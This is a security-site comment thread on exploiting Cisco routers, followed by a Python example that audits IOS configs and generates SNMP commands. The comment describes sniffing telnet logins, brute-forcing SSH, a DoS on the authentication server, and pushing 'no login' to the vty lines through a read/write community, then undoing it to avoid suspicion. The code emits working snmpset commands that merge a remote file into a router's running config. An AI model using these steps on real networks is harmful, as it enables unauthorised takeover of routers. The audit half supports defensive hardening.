Exploiting Cisco Routers: Part 2
Mark Wolfgang

Comments

Exploiting Cisco Routers: Part 2 (2006-09-20)
Anonymous (1 reply)

Re: Exploiting Cisco Routers: Part 2 (2008-01-17)
Anonymous
You're right: with the RW community string you can change anything you want, including the passwords. You'd have to change the passwords back if you don't want to raise suspicion. However, many times you will find that you have to modify the access list in order to allow yourself to use SNMP. If you're not in that specific list, you might get the wrongful impression that the router (or switch) isn't running SNMP at all.

Ultimately, you want an actual session with the router. There are many things about a network you can't find out by just viewing configs.

The easiest way to gain telnet access would be to put a sniffer somewhere on the network, given that usernames and passwords are sent in plain text via telnet. Nowadays, many corporate networks run wireless via modules that are a direct part of the Cisco devices. There's a good chance a wireless sniffer would come up with an admin talking to his router if you leave it on long enough.

If telnet is not configured on the device, but SSH is... brute force will have to do.

Also, many times you will run into a device that only has a read-only community string, not a read/write one. In this case, brute force will have to do. (You'll rarely find one of those easily decryptable passwords anymore.)

Like the article said, you may run into problems if there is a parent server (TACACS or RADIUS) providing authentication. Depending on your scenario (if you can view the config, but can't gain access), you could try a DoS attack on that server (the WAN Killer that is part of SolarWinds works nicely). If you attempt a login to a router and it cannot reach its authentication server, it will most likely revert to a local username and password that the admin has configured.

However, if you do come across a read/write community string: the little "line vty 0 4" at the bottom of the config file is the virtual terminal config (telnet or SSH). You can upload the following to the device:

line vty 0 4
 no login

Now you telnet in to the device and you won't be asked to authenticate yourself... you'll just be given access. When you're finished:

line vty 0 4
 login

And all is back to normal: no passwords changed, no brute forcing.

Sorry... I'm rambling.


Link to this comment: http://www.securityfocus.com/comments/infocus/1749/1048#1048
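The comment above describes the two sides of the same weakness: an SNMP read/write community string lets an attacker merge a config fragment such as "line vty 0 4 / no login" into the running configuration, and the config itself shows whether that is possible. The following is an added example written for this page, not code from the commenter, the article or Cisco. The audit function scans IOS-style configuration text for exactly the conditions the comment relies on (an RW community with no access list, a vty block with "no login", a vty that still accepts telnet), and the second function emits the net-snmp commands that perform the "upload" the commenter mentions, using the CISCO-CONFIG-COPY-MIB (ccCopy) table to have the router fetch a file over TFTP and merge it into running-config. The two sample configurations, the hostnames, the 192.0.2.x addresses, the row index 333 and the file name are all constructed for the example; the block assumes the target supports CISCO-CONFIG-COPY-MIB and that the net-snmp `snmpset`/`snmpget` tools are what you would run.

```python
import re

# Constructed sample configs for the example (not taken from a real device).
# WEAK_CONFIG has the conditions the comment exploits; HARDENED_CONFIG closes them.
WEAK_CONFIG = """\
hostname edge-rtr
!
snmp-server community public RO
snmp-server community private RW
!
line vty 0 4
 no login
 transport input telnet
!
end
"""

HARDENED_CONFIG = """\
hostname edge-rtr
!
ip access-list standard SNMP-MGMT
 permit 10.0.0.5
!
snmp-server community s3cr3t-rw RW SNMP-MGMT
!
line vty 0 4
 login local
 transport input ssh
!
end
"""

# CISCO-CONFIG-COPY-MIB::ccCopyEntry; columns used below are
# .2 ccCopyProtocol, .3 ccCopySourceFileType, .4 ccCopyDestFileType,
# .5 ccCopyServerAddress, .6 ccCopyFileName, .10 ccCopyState, .14 ccCopyEntryRowStatus
CCOPY = "1.3.6.1.4.1.9.9.96.1.1.1.1"


def audit_ios_config(config):
    """Return a list of findings describing why the config is exposed to the
    SNMP-RW / vty attack from the comment. Empty list means none of the checks fired.
    Only the plain 'snmp-server community <name> RO|RW [acl]' form is parsed;
    the 'view' form is not handled."""
    findings = []

    for m in re.finditer(r"^snmp-server community (\S+) (RO|RW)(?: (\S+))?",
                         config, re.M | re.I):
        name, mode, acl = m.groups()
        if mode.upper() == "RW" and not acl:
            findings.append(f"RW community '{name}' has no access-list: anyone who "
                            f"learns it can rewrite the running config")

    # A 'line vty' block runs from its header to the next unindented line.
    for m in re.finditer(r"^(line vty [^\n]*)\n((?:[ \t]+[^\n]*\n?)*)", config, re.M):
        header, body = m.group(1), m.group(2)
        sub = [line.strip() for line in body.splitlines()]
        if "no login" in sub:
            findings.append(f"{header}: 'no login' present, sessions are accepted "
                            f"without authentication")
        transport = [line for line in sub if line.startswith("transport input")]
        if not transport or any(" telnet" in t or t.endswith(" all") for t in transport):
            # With no 'transport input' the platform default applies, which on
            # many IOS releases still permits telnet.
            findings.append(f"{header}: telnet accepted, credentials cross the wire "
                            f"in cleartext")
    return findings


def snmpset_config_merge(host, community, tftp_server, filename, row=333):
    """Return the net-snmp commands that make <host> pull <filename> from
    <tftp_server> and merge it into running-config (equivalent to
    'copy tftp running-config'). The row index is an arbitrary free integer."""
    base = f"snmpset -v2c -c {community} {host}"
    return [
        f"{base} {CCOPY}.2.{row} i 1",              # ccCopyProtocol = tftp
        f"{base} {CCOPY}.3.{row} i 1",              # ccCopySourceFileType = networkFile
        f"{base} {CCOPY}.4.{row} i 4",              # ccCopyDestFileType = runningConfig
        f"{base} {CCOPY}.5.{row} a {tftp_server}",  # ccCopyServerAddress
        f"{base} {CCOPY}.6.{row} s {filename}",     # ccCopyFileName
        f"{base} {CCOPY}.14.{row} i 4",             # ccCopyEntryRowStatus = createAndGo
        f"snmpget -v2c -c {community} {host} {CCOPY}.10.{row}",  # ccCopyState, 3 = successful
        f"{base} {CCOPY}.14.{row} i 6",             # ccCopyEntryRowStatus = destroy
    ]


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{name}] {audit_ios_config(cfg) or 'no findings'}")
    print("\n".join(snmpset_config_merge("192.0.2.1", "private", "192.0.2.50", "vty.cfg")))
```

The same ccCopy sequence, pointed at a file containing "line vty 0 4" and " login", is the reversal step the commenter describes, and with ccCopySourceFileType set to runningConfig (4) and ccCopyDestFileType to networkFile (1) it becomes the config download that the article's "view the config" step relies on. On the defensive side, the hardened sample shows the two fixes the audit checks for: the RW community bound to a standard ACL, and the vty restricted to SSH with "login local".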
Copyright 2008, SecurityFocus